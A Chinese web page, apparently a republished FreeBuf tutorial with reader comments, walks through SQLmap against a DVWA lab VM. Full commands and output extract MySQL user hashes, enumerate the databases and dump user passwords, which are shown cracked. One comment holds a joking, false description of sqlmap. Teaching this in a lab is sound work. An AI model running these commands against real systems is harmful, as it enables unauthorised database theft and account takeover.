CVE漏洞中文网

0DayBank一个专门收集整理全球互联网漏洞的公开发布网站
  1. 首页
  2. 百科
  3. 正文

注入

2017年5月23日 782点热度 0人点赞 0条评论

注入

  • 首页
  • 分类阅读
  • 文库
  • 专栏
  • 公开课
  • 商城
  • 漏洞盒子
注册 | 登录
投稿

SQL注入之SQLmap入门

Taskiller2014-03-27+19共4776432人围观 ,发现 49 个不明物体WEB安全

什么是SQLmap?

SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。

读者可以通过位于SourceForge的官方网站下载SQLmap源码:http://sourceforge.net/projects/sqlmap/

SQLmap的作者是谁?

Bernardo DameleAssumpcao Guimaraes (@inquisb),读者可以通过bernardo@sqlmap.org与他取得联系,以及Miroslav Stampar (@stamparm)读者可以通过miroslav@sqlmap.org与他联系。

同时读者也可以通过dev@sqlmap.org与SQLmap的所有开发者联系。

执行SQLmap的命令是什么?

进入sqlmap.py所在的目录,执行以下命令:

#python sqlmap.py -h

(译注:选项列表太长了,而且与最新版本有些差异,所以这里不再列出,请读者下载最新版在自己机器上看吧)

SQLmap命令选项被归类为目标(Target)选项、请求(Request)选项、优化、注入、检测、技巧(Techniques)、指纹、枚举等。

如何使用SQLmap:

为方便演示,我们创建两个虚拟机:

1、受害者机器, windows     XP操作系统,运行一个web服务器,同时跑着一个包含漏洞的web应用(DVWA)。

2、攻击器机器,使用Ubuntu     12.04,包含SQLmap程序。

本次实验的目的:使用SQLmap得到以下信息:

3、枚举MYSQL用户名与密码。

4、枚举所有数据库。

5、枚举指定数据库的数据表。

6、枚举指定数据表中的所有用户名与密码。

使用SQLmap之前我们得到需要当前会话cookies等信息,用来在渗透过程中维持连接状态,这里使用Firefox中名为“TamperData”的add-on获取。

当前得到的cookie为“security=high;PHPSESSID=57p5g7f32b3ffv8l45qppudqn3″。

为方便演示,我们将DVWA安全等级设置为low:

接下来我们进入页面的“SQL Injection”部分,输入任意值并提交。可以看到get请求的ID参数如下:

“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#”

因此该页面就是我们的目标页面。

以下命令可以用来检索当前数据库和当前用户:

“./sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” -b –current-db –current-user”

使用选项:

1、–cookie : 设置我们的cookie值“将DVWA安全等级从high设置为low”

2、-u : 指定目标URL

3、-b : 获取DBMS banner

4、–current-db : 获取当前数据库

5、–current-user:获取当前用户

结果如下:

可以看到结果如下:

DBMS : MySQLversion 5.0
OS versionUbuntu 12.04
current user:root
current db :DVWA

以下命令用来枚举所有的DBMS用户和密码hash,在以后更进一步的攻击中可以对密码hash进行破解:

“sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” --string=”Surname” --users --password”

使用选项:

1、–string : 当查询可用时用来匹配页面中的字符串

2、–users : 枚举DBMS用户

3、–password : 枚举DBMS用户密码hash

结果如下:

databasemanagement system users [142]:
[*] ”@’kingasmk’
[*]”@’localhost’
[*]‘debian-sys-maint’@'localhost’
[*]‘phpmyadmin’@'localhost’
[*]‘root’@’127.0.0.1′
[*] ‘root’@'::1′
[*]‘root’@'kingasmk’
[*]‘root’@'localhost’

数据库管理系统用户和密码hash:

[*]debian-sys-maint [1]:
password hash:*C30441E06530498BC86019BF3211B94B3BAB295A
[*] phpmyadmin[1]:
password hash:*C30441E06530498BC86019BF3211B94B3BAB295A
[*] root [4]:
password hash: *C30441E06530498BC86019BF3211B94B3BAB295A
password hash:*C30441E06530498BC86019BF3211B94B3BAB295A
password hash:*C30441E06530498BC86019BF3211B94B3BAB295A
password hash:*C30441E06530498BC86019BF3211B94B3BAB295A

读者可以使用Cain&Abel、John&Ripper等工具将密码hash破解为明文。以下命令会枚举系统中所有的数据库schema:

“sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit”
--cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” --dbs”

使用选项:

  • –dbs: 枚举DBMS中的数据库

结果如下:

availabledatabases [5]:
[*]dvwa
[*]information_schema
[*]mysql
[*]performance_schema
[*]phpmyadmin

下面我们尝试枚举DVWA数据表,执行以下命令:

“sqlmap.py-u “http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” -D dvwa --tables”

使用选项:

1、-D : 要枚举的DBMS数据库

2、–tables     : 枚举DBMS数据库中的数据表

得到结果如下:

Database: dvwa
[2 tables]
+————+
| guestbook |
| users |
+————+

下面获取用户表的列,命令如下:

 “sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” --cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” -D dvwa -T users --columns”

使用选项:

  • -T : 要枚举的DBMS数据库表
  • –columns : 枚举DBMS数据库表中的所有列

结果如下:

Database: dvwa
Table: users
[6 columns]
+————+————-+
| Column | Type|
+————+————-+
| avatar |varchar(70) |
| first_name |varchar(15) |
| last_name |varchar(15) |
| password |varchar(32) |
| user |varchar(15) |
| user_id |int(6) |
+————+————-+

如上所示,以上为我们感兴趣的列,表示用户名与密码等。下面将每一列的内容提取出来。执行以下命令,将用户与密码表中的所有用户名与密码dump出来:

“sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit”–cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low” -D dvwa -T users-C user,password --dump”

使用选项:

  • -T : 要枚举的DBMS数据表
  • -C: 要枚举的DBMS数据表中的列
  • –dump : 转储DBMS数据表项

SQLmap会提问是否破解密码,按回车确认:

得到所有用户名与明文密码如下:

Database: dvwa
Table: users
[5 entries]
+———+———+———————————————+
| user_id | user| password |
+———+———+———————————————+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99(password) |
| 2 | gordonb |e99a18c428cb38d5f260853678922e03 (abc123) |
| 3 | 1337 |8d3533d75ae2c3966d7e0d4fcc69216b (charley) |
| 4 | pablo |0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) |
| 5 | smithy |5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+———+———+———————————————+

这时我们就可以利用admin帐户登录做任何事了。

总结:

SQLmap是一个非常强大的工具,可以用来简化操作,并自动处理SQL注入检测与利用。

[via infosecinstitute]

Taskiller

Taskiller29 篇文章等级: 5级
|
|
  • 上一篇:​​Light4Freedom战队BCTF攻略(上)
  • 下一篇:用户名+123456,轻松写意登陆eBay日本论坛

这些评论亮了

  • 那个疼(1级)回复
    刚才有个三炮告诉我SQLMAP是扫端口的,真他妈逗,SQLMAP是扫网站目录的好嘛?笑死我了,真想一嘴巴子呼死他.我记得SQLMAP是Hades在<<来自星星的你>>中使用最经典的系统,从而一举成名,被京东CEO李开复收购,于某年某月成功进军<<天天向上>>,凭着一首对女朋友的思念的高歌,而闻名世界.
    )148(亮了
  • WeirdBird007(3级)干过开发,日过渗透,某乙方渗透>_< '...回复
    wooyun 发过 两篇 更详细的。。。
    http://drops.wooyun.org/tips/143
    http://drops.wooyun.org/tips/401
    )44(亮了
  • EvilPing(1级)回复
    我以为sqlmap是地图那...
    )19(亮了
  • 敲什么呢i(1级)回复
    重复造轮子
    )17(亮了
  • sam回复
    @lisp 就是发了 freebuf也会审核你的文字格式 排版 措辞 你懂得 后来还是不发了
    )15(亮了
发表评论

已有 49 条评论

  • 浩天寰宇 (3级)猴子是我请来的逗比~ 2014-03-27回复1楼

    ubuntu那个边框是单加上去的吗?

    亮了(4)
    • abcd (1级) 2014-03-27回复

      @浩天寰宇  vm有这功能

      亮了(8)
      • yyyy3333 2014-03-28回复

        @abcd  传说叫 无缝结合

        亮了(4)
      • 浩天寰宇 (3级)猴子是我请来的逗比~ 2014-03-31回复

        @abcd  我能在KALI下加这么一个条吗

        亮了(7)
      • kaliplayer (1级) 2017-04-16回复

        @ 浩天寰宇 那个,kali2.0就有边框,不信你试试

        亮了(1)
    • 请叫我伪大神 2014-04-09回复

      @浩天寰宇  这是ubuntu的桌面,骚年多读读课本

      亮了(8)
      • Sarshes 2015-07-02回复

        @ 请叫我伪大神 孩子,多读读书…

        亮了(2)
  • MeirLin (5级)研表究明,汉字的序顺并不定一能影阅响读,比如当你看完这句话后... 2014-03-27回复2楼

    很好的普及。

    亮了(9)
  • mmtt (4级) 2014-03-27回复3楼

    渗透必备神器

    亮了(5)
  • WeirdBird007 (3级)干过开发,日过渗透,某乙方渗透>_< '... 2014-03-27回复4楼

    wooyun 发过 两篇 更详细的。。。

    http://drops.wooyun.org/tips/143

    http://drops.wooyun.org/tips/401

    亮了(44)
    • Taskiller (5级) 2014-03-28回复

      @WeirdBird007  那两篇详细讲解了各个选项的意思、用法,这一篇是一个简单的具体实例,我个人不认为这是冲突的

      亮了(9)
  • lisp 2014-03-27回复5楼

    希望可以多发表些技巧和专业性更强的文章
    sqlmap很多高级用法和高级场景,从来没见人发表
    我想很多人研究过sqlmap的源码
    但是没人发个文
    又不是做黑产,没必要藏着掖着

    亮了(3)
    • sam 2014-03-28回复

      @lisp 就是发了 freebuf也会审核你的文字格式 排版 措辞 你懂得 后来还是不发了

      亮了(15)
  • 敲什么呢i (1级) 2014-03-27回复6楼

    重复造轮子

    亮了(17)
  • Flincllck (1级) 2014-03-27回复7楼

    这个不是 metasploit魔鬼训练营 里面的案例讲解吗?

    亮了(2)
    • Taskiller (5级) 2014-03-28回复

      @Flincllck  没有买这本书,请帮忙确认一下,谢谢,如果这篇文章确实和书上的东西都一样,我会联系小编请他把这篇文章拿掉。

      亮了(5)
  • luom 2014-03-27回复8楼

    –suffix –perfix –os-pwn –threads 呢? 这些简单的功能 百度 一大推

    亮了(2)
  • 李彦宏 2014-03-28回复9楼

    终于见到map了,在茫茫盘海中,我就把服务器权限给你,没个一二百年你也拖不完呀~~~

    亮了(6)
    • lisp 2014-03-28回复

      @李彦宏 亲爱的,不解释

      亮了(4)
  • tink 2014-03-28回复10楼

    这是是明目张胆发文刷币吗

    亮了(3)
  • ovens (3级) 2014-03-28回复11楼

    这也可以过? 明天我也刷币玩玩

    亮了(3)
  • evan-css (1级) 2014-03-28回复12楼

    有没有DVWA High级别的SQLMap使用方法?

    亮了(3)
    • xiao_hen (4级)人是无法在快乐中成长的。快乐只能使人肤浅,我们在痛苦中成长,... 2014-03-28回复

      @evan-css  哈,一块期待。

      亮了(2)
  • chenyoufu123 2014-03-28回复13楼

    haoba, wo juede ma shang jiu lun wei heike jidi de shui ping le

    亮了(3)
  • 周鸿祎 2014-03-28回复14楼

    搞什么飞机!
    http://resources.infosecinstitute.com/sql-injection/

    亮了(5)
  • April_2nd 2014-03-28回复15楼

    为什么我下载的源码会报错呢
    File "./sqlmap.py", line 119
    finally:
    ^
    SyntaxError: invalid syntax

    亮了(4)
  • mark 2014-03-28回复16楼

    雨夜Climb,收藏成功。请访问 稍后再读! 你可以关注 获得私信提醒。

    亮了(1)
  • 带脚镣跳舞 2014-03-28回复17楼

    亮了(1)
  • 雨夜Climb 2014-03-28回复18楼

    好!

    亮了(1)
  • jinifly 2014-03-28回复19楼

    mark

    亮了(2)
  • 深圳流浪人008 2014-03-28回复20楼

    亮了(2)
  • 那个疼 (1级) 2014-03-28回复21楼

    刚才有个三炮告诉我SQLMAP是扫端口的,真他妈逗,SQLMAP是扫网站目录的好嘛?笑死我了,真想一嘴巴子呼死他.我记得SQLMAP是Hades在<<来自星星的你>>中使用最经典的系统,从而一举成名,被京东CEO李开复收购,于某年某月成功进军<<天天向上>>,凭着一首对女朋友的思念的高歌,而闻名世界.

    亮了(148)
  • pinnnk。 (3级) 2014-03-31回复22楼

    要是有windows下的 就更好了~

    亮了(2)
    • 无才布衣 (4级) 2014-04-01回复

      @pinnnk。  sqlmap win下也可以用的

      亮了(2)
    • alex57xp32 (1级) 2014-07-18回复

      @pinnnk。  sqlmap是python。。懂嘛,跨平台的。

      亮了(1)
  • expertwk (1级) 2014-04-01回复23楼

    good!

    亮了(2)
  • chenyoufu123 2014-04-01回复24楼

    谁牛逼发个dvwa high级别的sqli注入上来

    亮了(6)
    • 浩天寰宇 (3级)猴子是我请来的逗比~ 2014-04-10回复

      @chenyoufu123 同求

      亮了(3)
  • chenyoufu123 2014-04-01回复25楼

    为什么这个文章有19个金币?

    亮了(2)
  • MeirLin (5级)研表究明,汉字的序顺并不定一能影阅响读,比如当你看完这句话后... 2014-04-01回复26楼

    - – +19的金币是如何考虑的?

    亮了(4)
    • FB客服 (7级)FreeBuf官方客服 2014-04-01回复

      @MeirLin  FB有专门的文章评审团队,评审组里每个成员会对每篇需要加金币的文章进行评分,最后取平均值作为该文的最终得分。

      亮了(3)
  • EvilPing (1级) 2014-04-05回复27楼

    我以为sqlmap是地图那…

    亮了(19)
  • 蛋蛋一号_ 2014-04-13回复28楼

    转发微博

    亮了(1)
  • seeyoulater 2014-05-19回复29楼

    sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit”–cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3; security=low” -D dvwa -T users-C user,password –dump

    users和-C之间少了一个空格

    亮了(4)
  • VINCE67 (1级) 2014-06-04回复30楼

    nice

    亮了(1)
  • mudongliangabcd (2级)信息安全方向研究生,Debian使用者及拥护者! 2015-05-30回复31楼

    按照作者的方法去做第一步就没有成功!我用的官方的owasp虚拟机!这个版本在进入sqli时有一个登录的过程!

    亮了(4)
  • zoonctrl (5级)该怎么做好信息安全? 2015-10-08回复32楼

    写的比较简单

    亮了(3)
  • bluerainerz (1级) 2016-01-27回复33楼

    :mrgreen: 看来注入还是的使用linux系统才够高端。

    亮了(1)
  • buildall (1级) 2016-11-28回复34楼

    以下命令可以用来检索当前数据库和当前用户:

    “./sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” -b –current-db –current-user”

    那个cookie的前面缺了个杠杠。。

    亮了(2)

必须您当前尚未登录。登陆?注册

必须(保密)

表情插图

取消

Taskiller

Taskiller

这家伙太懒,还未填写个人描述!

29 篇文章14 条评论

相关阅读

  • 【免费报名通道开启】FreeTalk•成都站议题公布
  • 安全研究人员最爱的15款操作系统(含下载)
  • NSA方程式有更多黑客工具下载了!信息量很大,连中国运营商都被入侵过?
  • 黑客专访:天才黑客Gabriel Bergel的黑客人生
  • 当黑客邂逅爱情续:不作死就不会死

特别推荐

关注我们 分享每日精选文章

不容错过

  • 外媒报道:中国知名ARM制造商全志科技在Linux中留下内核后门dawner2016-05-13
  • 翻墙?隐私?今天聊聊VPN的那些事儿dawner2016-06-12
  • Splunk+蜜罐+防火墙=简易WAFRipZ2016-12-05
  • “鑫胖”家的红星3.0系统被曝漏洞,可远程执行任意命令注入bimeover2016-12-07

FREEBUF

  • 免责声明
  • 关于我们
  • 加入我们

广告及服务

  • 寻求报道
  • 广告合作
  • 联系我们
  • 友情链接

关注我们

  • 官方微信
  • 新浪微博
  • 腾讯微博
  • Twitter

赞助商

Copyright © 2013 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号

css.php

正在加载中...

0daybank

标签: 暂无
最后更新:2017年5月23日

小助手

这个人很懒,什么都没留下

点赞
< 上一篇
下一篇 >

文章评论

您需要 登录 之后才可以评论

COPYRIGHT © 2024 www.pdr.cn CVE漏洞中文网. ALL RIGHTS RESERVED.

鲁ICP备2022031030号

联系邮箱:wpbgssyubnmsxxxkkk@proton.me